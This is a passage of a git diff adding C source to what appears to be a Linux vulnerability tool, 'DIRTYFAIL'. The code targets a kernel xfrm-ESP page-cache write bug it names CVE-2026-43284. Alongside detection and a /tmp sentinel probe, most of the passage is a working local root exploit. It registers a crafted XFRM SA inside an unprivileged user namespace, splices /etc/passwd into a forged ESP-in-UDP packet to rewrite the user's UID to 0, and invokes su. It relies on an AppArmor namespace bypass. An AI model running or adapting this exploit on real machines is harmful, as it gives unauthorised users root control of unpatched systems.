(CVE-2026-43284) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + /* The vulnerable branch was introduced in 2017 (cac2661c53f3) and + * the upstream fix is f4c50a4034e6 (2026-05-07). We can't easily + * tell whether a particular distro kernel has the backport, so we + * report based on prereq presence and let the operator decide. */ + + /* esp4 / esp6 modules. They autoload on first XFRM SA registration, + * but we want to know if the build supports them at all. /proc/modules + * lists currently-loaded; that's a strong positive signal. */ + bool esp4 = kmod_loaded("esp4"); + bool esp6 = kmod_loaded("esp6"); + log_hint("esp4 currently loaded: %s", esp4 ? "yes" : "no"); + log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_ok("xfrm-ESP variant unreachable without unprivileged userns"); + log_hint("on Ubuntu, this is the expected hardening β€” but the RxRPC " + "variant of Dirty Frag may still be reachable. Run with " + "--check-rxrpc."); + return DF_PRECOND_FAIL; + } + + if (!esp4 && !esp6) { + log_hint("no esp4/esp6 currently loaded; the kernel will autoload them " + "on first SA registration. We treat this as still vulnerable."); + } + + /* On hardened distros (Ubuntu 26.04+) caps are stripped inside the + * userns even after our bypass β€” kernel may still have the bug but + * unprivileged users can't reach it. Report that honestly rather + * than claiming VULNERABLE. */ + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” kernel may still have the bug but the AppArmor " + "policy denies CAP_NET_ADMIN inside any unprivileged userns."); + log_hint("unprivileged exploitation is blocked; real root can still " + "reach the kernel bug. Apply the kernel patch as soon as your " + "distro ships it."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing v4 ESP-in-UDP trigger against /tmp sentinel"); + df_result_t pr = dirtyfrag_esp_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE (preconditions met) β€” userns + xfrm SA registration " + "available, kernel within affected window"); + log_warn("apply mainline patch f4c50a4034e6 or your distro's backport"); + log_warn("interim mitigation: `dirtyfail --mitigate` or manually blacklist " + "esp4/esp6 in /etc/modprobe.d/"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ---------------------------------------------------------------- * + * Exploit β€” only compiled with full bodies on Linux. + * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +/* Write a small string to a /proc file. */ +static bool write_proc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t want = strlen(value); + ssize_t got = write(fd, value, want); + close(fd); + return got == want; +} + +/* ---- Netlink XFRM SA registration --------------------------------- * + * + * The XFRM SA registration is built by hand. Each attribute is a 4-byte + * aligned struct rtattr { u16 rta_len; u16 rta_type; } followed by + * payload. The total nlmsg length is filled in last. + * + * Register an XFRM_MSG_NEWSA carrying our marker in replay_esn.seq_hi. + */ +static bool xfrm_register_sa(int nl, const unsigned char seq_hi[4]) +{ + char buf[2048] = {0}; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + struct xfrm_usersa_info *usa = + (struct xfrm_usersa_info *)NLMSG_DATA(nlh); + + nlh->nlmsg_type = XFRM_MSG_NEWSA; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 1; + + /* Selector: src/dst 127.0.0.1, IPv4 */ + usa->sel.daddr.a4 = htonl(0x7f000001); + usa->sel.saddr.a4 = htonl(0x7f000001); + usa->sel.family = AF_INET; + usa->sel.prefixlen_d = 32; + usa->sel.prefixlen_s = 32; + + usa->id.daddr.a4 = htonl(0x7f000001); + usa->id.spi = htonl(ESP_SPI); + usa->id.proto = IPPROTO_ESP; + + usa->saddr.a4 = htonl(0x7f000001); + + usa->lft.soft_byte_limit = (uint64_t)-1; + usa->lft.hard_byte_limit = (uint64_t)-1; + usa->lft.soft_packet_limit = (uint64_t)-1; + usa->lft.hard_packet_limit = (uint64_t)-1; + + usa->reqid = 0x1234; + usa->family = AF_INET; + usa->mode = XFRM_MODE_TRANSPORT; + usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */ + usa->flags = XFRM_STATE_ESN; + + size_t hdrlen = sizeof(*nlh) + sizeof(*usa); + size_t attrs = 0; + char *abuf = buf + hdrlen; + + /* + * The kernel's xfrm code does NOT accept `authencesn(...)` as a + * single XFRMA_ALG_AEAD attribute β€” it's a composition that has + * to be assembled from separate auth + crypt parts. We register: + * XFRMA_ALG_AUTH_TRUNC : hmac(sha256) with 32-byte key, 128-bit ICV + * XFRMA_ALG_CRYPT : cbc(aes) with 16-byte key + * + * The kernel internally wires these into authencesn(hmac(sha256), + * cbc(aes)) when it sees XFRM_STATE_ESN on the SA. + */ + { /* XFRMA_ALG_AUTH_TRUNC */ + struct xfrm_algo_auth *aa; + unsigned short dlen = sizeof(*aa) + 32; /* HMAC-SHA256 key */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_AUTH_TRUNC; + r->rta_len = RTA_LENGTH(dlen); + aa = (struct xfrm_algo_auth *)RTA_DATA(r); + memset(aa, 0, dlen); + strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1); + aa->alg_key_len = 32 * 8; /* bits */ + aa->alg_trunc_len = 128; /* bits β€” truncated MAC width */ + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ALG_CRYPT */ + struct xfrm_algo *ea; + unsigned short dlen = sizeof(*ea) + 16; /* AES-128 key */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_CRYPT; + r->rta_len = RTA_LENGTH(dlen); + ea = (struct xfrm_algo *)RTA_DATA(r); + memset(ea, 0, dlen); + strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1); + ea->alg_key_len = 16 * 8; + attrs += RTA_SPACE(dlen); + } + + /* XFRMA_REPLAY_ESN_VAL β€” this is where seq_hi rides */ + { + struct xfrm_replay_state_esn *esn; + unsigned short dlen = sizeof(*esn) + 4; /* bmp_len * 4 = 4 */ + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_REPLAY_ESN_VAL; + r->rta_len = RTA_LENGTH(dlen); + esn = (struct xfrm_replay_state_esn *)RTA_DATA(r); + memset(esn, 0, dlen); + esn->bmp_len = 1; + esn->oseq = 0; + esn->seq = 100; + esn->oseq_hi = 0; + memcpy(&esn->seq_hi, seq_hi, 4); /* THE PRIMITIVE INPUT */ + esn->replay_window = 32; + attrs += RTA_SPACE(dlen); + } + + /* XFRMA_ENCAP β€” UDP encapsulation, sport=dport=4500 */ + { + struct xfrm_encap_tmpl *enc; + unsigned short dlen = sizeof(*enc); + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ENCAP; + r->rta_len = RTA_LENGTH(dlen); + enc = (struct xfrm_encap_tmpl *)RTA_DATA(r); + memset(enc, 0, dlen); + enc->encap_type = UDP_ENCAP_ESPINUDP; + enc->encap_sport = htons(ENCAP_PORT); + enc->encap_dport = htons(ENCAP_PORT); + enc->encap_oa.a4 = 0; + attrs += RTA_SPACE(dlen); + } + + nlh->nlmsg_len = hdrlen + attrs; + + struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; + if (sendto(nl, buf, nlh->nlmsg_len, 0, + (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) + return false; + + /* Drain ACK */ + char ack[4096]; + ssize_t n = recv(nl, ack, sizeof(ack), 0); + if (n < (ssize_t)sizeof(struct nlmsghdr)) return false; + struct nlmsghdr *r = (struct nlmsghdr *)ack; + if (r->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r); + if (e->error != 0) { + log_bad("XFRM_MSG_NEWSA: %s", strerror(-e->error)); + return false; + } + } + return true; +} + +/* Bring loopback up inside the new netns. */ +static bool bring_lo_up(void) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + ifr.ifr_flags = IFF_UP | IFF_RUNNING; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + return rc == 0; +} + +/* Trigger esp_input by sending a forged ESP-in-UDP packet whose payload + * is a page-cache page from `target_path`, planted via splice at + * `splice_off`. The kernel STORE lands ~14 bytes into the spliced + * region (the v4 path has no V6_STORE_SHIFT-style offset). */ +static bool trigger_store_at(const char *target_path, loff_t splice_off) +{ + /* udp_recv: bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP set so + * incoming UDP frames are rerouted into xfrm_input -> esp_input. */ + int udp_recv = socket(AF_INET, SOCK_DGRAM, 0); + if (udp_recv < 0) return false; + struct sockaddr_in addr = { + .sin_family = AF_INET, + .sin_port = htons(ENCAP_PORT), + .sin_addr.s_addr = htonl(0x7f000001), + }; + int reuse = 1; + setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("bind udp_recv: %s", strerror(errno)); + close(udp_recv); return false; + } + int encap = UDP_ENCAP_ESPINUDP; + if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { + log_bad("UDP_ENCAP_ESPINUDP: %s", strerror(errno)); + close(udp_recv); return false; + } + + /* udp_send: connect to udp_recv. Packets we splice here will arrive + * at udp_recv via loopback and feed xfrm_input. */ + int udp_send = socket(AF_INET, SOCK_DGRAM, 0); + if (udp_send < 0) { close(udp_recv); return false; } + if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("connect udp_send: %s", strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + /* Build wire ESP header: SPI(4) || seq_no(4) || IV(16) = 24 bytes. + * IV value doesn't matter β€” auth check fails after the STORE. */ + unsigned char wire_hdr[24]; + *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(wire_hdr + 4) = htonl(101); /* seq_no_lo */ + memset(wire_hdr + 8, 0xCC, 16); + + /* Open the target file for splicing. */ + int pfd = open(target_path, O_RDONLY); + if (pfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + int p[2]; + if (pipe(p) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(pfd); close(udp_recv); close(udp_send); return false; + } + + /* vmsplice the wire header into the pipe (24 bytes). */ + struct iovec iov = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) }; + if (vmsplice(p[1], &iov, 1, 0) != (ssize_t)sizeof(wire_hdr)) { + log_bad("vmsplice header: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + /* splice 16 bytes of target's page cache from splice_off. */ + loff_t off = splice_off; + if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) { + log_bad("splice file->pipe: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + /* splice the whole 40-byte payload from pipe to udp_send. */ + if (splice(p[0], NULL, udp_send, NULL, 24 + 16, SPLICE_F_MOVE) != 40) { + log_bad("splice pipe->udp: %s", strerror(errno)); + close(p[0]); close(p[1]); close(pfd); + close(udp_recv); close(udp_send); return false; + } + close(p[0]); close(p[1]); + + /* Drive the receive β€” esp_input runs inline here, performs the + * scratch-write, and we don't really care about the actual recv + * data (auth will fail with EBADMSG). + * + * The usleep gives the kernel a hard guarantee that the in-place + * decrypt has finished and the page-cache STORE is visible before + * we tear down the sockets. On a busy or slow VM, splice() can + * return before esp_input has actually fired. V4bel's reference + * exploit uses the same 150ms wait. */ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT); + + close(pfd); + close(udp_recv); + close(udp_send); + return true; +} + +/* Compatibility wrapper for the exploit path: target /etc/passwd. */ +static bool trigger_store(off_t passwd_off) +{ + return trigger_store_at("/etc/passwd", passwd_off); +} + +__attribute__((unused)) +static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("unshare: %s", strerror(errno)); + return 1; + } + if (!write_proc("/proc/self/setgroups", "deny")) { + log_bad("setgroups deny: %s", strerror(errno)); + return 1; + } + char map[64]; + snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_uid); + if (!write_proc("/proc/self/uid_map", map)) { + log_bad("uid_map: %s", strerror(errno)); + return 1; + } + snprintf(map, sizeof(map), "0 %u 1", (unsigned)real_gid); + if (!write_proc("/proc/self/gid_map", map)) { + log_bad("gid_map: %s", strerror(errno)); + return 1; + } + if (!bring_lo_up()) { + log_bad("bring lo up: %s", strerror(errno)); + return 1; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("AF_NETLINK XFRM: %s", strerror(errno)); + return 1; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("bind netlink: %s", strerror(errno)); + close(nl); return 1; + } + + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return 1; + } + log_ok("XFRM SA registered with seq_hi='%s'", MARKER); + + if (!trigger_store(passwd_off)) { + log_bad("trigger failed"); + close(nl); return 1; + } + log_ok("ESP-in-UDP trigger fired"); + + close(nl); + return 0; +} + +#else /* __linux__ */ +__attribute__((unused)) +static int run_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + (void)passwd_off; (void)real_uid; (void)real_gid; + return 1; +} +#endif + +/* ---------------------------------------------------------------- * + * INNER β€” runs in the AA bypass userns (post-stage 2). + * + * No user interaction, no fork, no verify, no su. Just the kernel + * work: open netlink, register SA, fire splice trigger, exit. + * The parent (init ns) owns everything else. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("inner: AF_NETLINK XFRM: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("inner: bind netlink: %s", strerror(errno)); + close(nl); + return DF_EXPLOIT_FAIL; + } + + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); + return DF_EXPLOIT_FAIL; + } + log_ok("inner: XFRM SA registered with seq_hi='%s'", MARKER); + + if (!trigger_store(uid_off)) { + close(nl); + return DF_EXPLOIT_FAIL; + } + log_ok("inner: ESP-in-UDP trigger fired at uid_off=%lld", + (long long)uid_off); + + close(nl); + return DF_EXPLOIT_OK; +#else + log_bad("dirtyfrag_esp_exploit_inner: Linux-only"); + return DF_TEST_ERROR; +#endif +} + +/* ---------------------------------------------------------------- * + * OUTER β€” runs in init namespace. + * + * Prompts the operator, sets env vars, fork β†’ child arms AA bypass + * and runs the inner. Parent stays in init ns, waits, reads the + * global page cache to verify, then either: + * - do_shell=true: execlp("su", user) β€” runs in init ns β†’ + * PAM reads modified /etc/passwd β†’ uid 0 β†’ real init-ns root + * - do_shell=false: try_revert_passwd_page_cache, return. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_exploit(bool do_shell) +{ + log_step("Dirty Frag (xfrm-ESP) β€” exploit"); + + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; this technique needs exactly 4", + uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to run xfrm-ESP page-cache write against /etc/passwd"); + log_warn("this enters a fresh user/net namespace, registers an XFRM SA, " + "and sends an ESP-in-UDP packet whose payload is the /etc/passwd " + "page from offset %lld", (long long)uid_off); + log_warn("on success the page cache will report '%s' as UID 0", user); + log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + return DF_OK; + } + if (!ssh_lockout_check(user)) { + log_bad("SSH-lockout confirmation declined β€” aborting"); + return DF_OK; + } + + /* Hand off to the inner via env vars + AA bypass fork. + * + * The child fork enters the bypass userns, runs + * dirtyfrag_esp_exploit_inner (dispatched from main() based on + * DIRTYFAIL_INNER_MODE), modifies the global page cache, exits. + * We (parent, init ns) read the result via the same global page + * cache and execlp(su) here in init ns for REAL root. */ + setenv("DIRTYFAIL_INNER_MODE", "esp", 1); + setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); /* argc/argv unused for forked variant */ + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init namespace β€” page cache is global, so we see the + * child's modification here. */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, MARKER, 4) != 0) { + log_bad("write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init namespace β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” used by `--scan --active`. + * + * Same userns + XFRM SA + splice-trigger setup as the exploit, but + * targets a sentinel file in /tmp instead of /etc/passwd. The parent + * (init ns) reads the sentinel after the child returns and looks for + * the marker bytes. + * + * If the marker landed β†’ kernel STORE is reachable β†’ DF_VULNERABLE. + * If the page is intact β†’ kernel is patched β†’ DF_OK. + * If AA blocks the bypass β†’ DF_PRECOND_FAIL. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("active-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("active-probe: netlink xfrm: %s", strerror(errno)); + return DF_TEST_ERROR; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("active-probe: bind netlink: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!bring_lo_up()) { + log_bad("active-probe: bring lo up: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!xfrm_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_TEST_ERROR; + } + if (!trigger_store_at(sentinel, 0)) { + close(nl); return DF_TEST_ERROR; + } + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t dirtyfrag_esp_active_probe(void) +{ + /* Sentinel file: 4 KiB of 'A' bytes. */ + char tmpl[] = "/tmp/dirtyfail-esp-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + /* Fault the page in. */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "esp-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("active-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + /* Re-read sentinel and search for marker. */ + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_warn("ACTIVE PROBE: STORE landed at offset %d β†’ kernel is VULNERABLE", i); + return DF_VULNERABLE; + } + } + log_ok("ACTIVE PROBE: page intact β€” kernel ESP path appears patched"); + return DF_OK; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp.h b/modules/copy_fail_family/dirtyfrag_esp.h new file mode 100644 index 0000000..57c3706 --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp.h @@ -0,0 +1,40 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp.h + * + * Public surface for the Dirty Frag xfrm-ESP variant (CVE-2026-43284). + */ + +#ifndef DIRTYFAIL_DIRTYFRAG_ESP_H +#define DIRTYFAIL_DIRTYFRAG_ESP_H + +#include "common.h" + +/* Run all preconditions for the xfrm-ESP primitive. Detection here is + * precondition-only: we do not register an SA in detect mode because + * doing so requires a fresh user namespace and side-effects loopback + * routing inside that namespace. Returns DF_VULNERABLE if all + * prerequisites are satisfied. */ +df_result_t dirtyfrag_esp_detect(void); + +/* OUTER (init namespace): user prompts β†’ resolve target β†’ fork β†’ + * wait for child to do the kernel work β†’ read global page cache to + * verify β†’ if do_shell, execlp("su", user) in init ns for REAL + * init-ns root via PAM. */ +df_result_t dirtyfrag_esp_exploit(bool do_shell); + +/* INNER (bypass userns): runs after AA bypass stage 2. Reads + * DIRTYFAIL_TARGET_USER from env, registers XFRM SA with seq_hi + * "0000", fires the splice trigger. No prompts, no su, no verify β€” + * the parent owns those. Exits with df_result_t cast to int. */ +df_result_t dirtyfrag_esp_exploit_inner(void); + +/* Active probe: fires the v4 ESP-in-UDP trigger against a /tmp sentinel + * file (never /etc/passwd) and reports whether the marker landed. + * Used by `--scan --active`. The inner half runs in the bypass userns + * and reads DIRTYFAIL_PROBE_SENTINEL for the target path. Returns + * DF_VULNERABLE on marker hit, DF_OK if patched, DF_PRECOND_FAIL on + * AA-block, DF_TEST_ERROR otherwise. */ +df_result_t dirtyfrag_esp_active_probe(void); +df_result_t dirtyfrag_esp_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfrag_esp6.c b/modules/copy_fail_family/dirtyfrag_esp6.c new file mode 100644 index 0000000..58494c3 --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp6.c @@ -0,0 +1,698 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp6.c β€” Dirty Frag IPv6 xfrm-ESP variant + * CVE-2026-43284 (IPv6 path) + * + * Reuses the same primitive shape as `dirtyfrag_esp.c`. See that file + * for the underlying root-cause analysis. This module differs only in + * the network-layer transport (AF_INET6 / ::1) and in padding the ESP + * frame to clear the v6-only size gate. + */ + +#include "dirtyfrag_esp6.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#include +#include + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, + size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); +#endif + +#ifndef UDP_ENCAP +#define UDP_ENCAP 100 +#endif +#ifndef UDP_ENCAP_ESPINUDP +#define UDP_ENCAP_ESPINUDP 2 +#endif +#ifndef IPPROTO_ESP +#define IPPROTO_ESP 50 +#endif + +#define ENCAP_PORT 4500 +#define ESP_SPI 0xDEADBE60 +#define MARKER "0000" +#define ALG_NAME "authencesn(hmac(sha256),cbc(aes))" + +/* xfrm6_input.c rejects skb->len < 48. Our wire layout is + * SPI(4)+seq(4)+IV(16)+target(16)+pad = 40+pad. Pad to 48 bytes. */ +#define V6_PAD_BYTES 8 + +/* Empirical STORE-offset shift between v4 and v6 paths. + * + * In v4, the authencesn scratch-write at dst[assoclen+cryptlen]=dst[24] + * lands at file_offset == splice_off (we proved this end-to-end on Ubuntu + * 24.04, kernel 6.8.0-111). In v6, with our [hdr(24)][passwd(16)][pad(8)] + * wire layout, the STORE empirically lands at splice_off + 9. The exact + * source of the +9 isn't fully understood (likely a frag-vs-linear + * accounting wrinkle in esp6_input's skb_to_sgvec), but it is consistent + * across runs at this kernel revision. + * + * We compensate by splicing from passwd_off - V6_STORE_SHIFT, so the + * STORE lands at the intended target offset. Re-test on different kernel + * versions; this constant may need recalibration. */ +#define V6_STORE_SHIFT 9 + +/* ---------------------------------------------------------------- * + * Detection + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp6_detect(void) +{ + log_step("Dirty Frag β€” IPv6 xfrm-ESP variant (CVE-2026-43284 v6 path) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + bool esp6 = kmod_loaded("esp6"); + log_hint("esp6 currently loaded: %s", esp6 ? "yes" : "no"); + + bool userns = unprivileged_userns_allowed(); + log_hint("unprivileged user namespace: %s", userns ? "allowed" : "DENIED"); + + if (!userns) { + log_ok("v6 xfrm-ESP variant unreachable without unprivileged userns"); + log_hint("if you are on Ubuntu, try with --aa-bypass to defeat the restriction"); + return DF_PRECOND_FAIL; + } + + /* Quick AF_INET6 reachability probe. */ + int s = socket(AF_INET6, SOCK_DGRAM, 0); + if (s < 0) { + log_ok("AF_INET6 unavailable (%s) β€” v6 path not reachable", + strerror(errno)); + return DF_PRECOND_FAIL; + } + close(s); + + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” same hardening that blocks v4 also blocks v6 " + "(unprivileged userns has no caps)."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing v6 ESP-in-UDP trigger against /tmp sentinel"); + df_result_t pr = dirtyfrag_esp6_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE (preconditions met) β€” v6 xfrm SA registration available"); + log_warn("Apply mainline patch f4c50a4034e6 (covers both v4 and v6)"); + log_warn("Some distro backports may have shipped v4-only β€” test both paths"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ---------------------------------------------------------------- * + * Exploit + * ---------------------------------------------------------------- */ + +#ifdef __linux__ + +static bool wproc(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t n = write(fd, value, strlen(value)); + close(fd); + return n == (ssize_t)strlen(value); +} + +static bool xfrm6_register_sa(int nl, const unsigned char seq_hi[4]) +{ + char buf[2048] = {0}; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + struct xfrm_usersa_info *usa = + (struct xfrm_usersa_info *)NLMSG_DATA(nlh); + + nlh->nlmsg_type = XFRM_MSG_NEWSA; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + nlh->nlmsg_seq = 1; + + /* IPv6 selectors / SA addresses. ::1 = {0,...,0,1}. */ + static const struct in6_addr loop6 = IN6ADDR_LOOPBACK_INIT; + memcpy(&usa->sel.daddr.a6, &loop6, 16); + memcpy(&usa->sel.saddr.a6, &loop6, 16); + 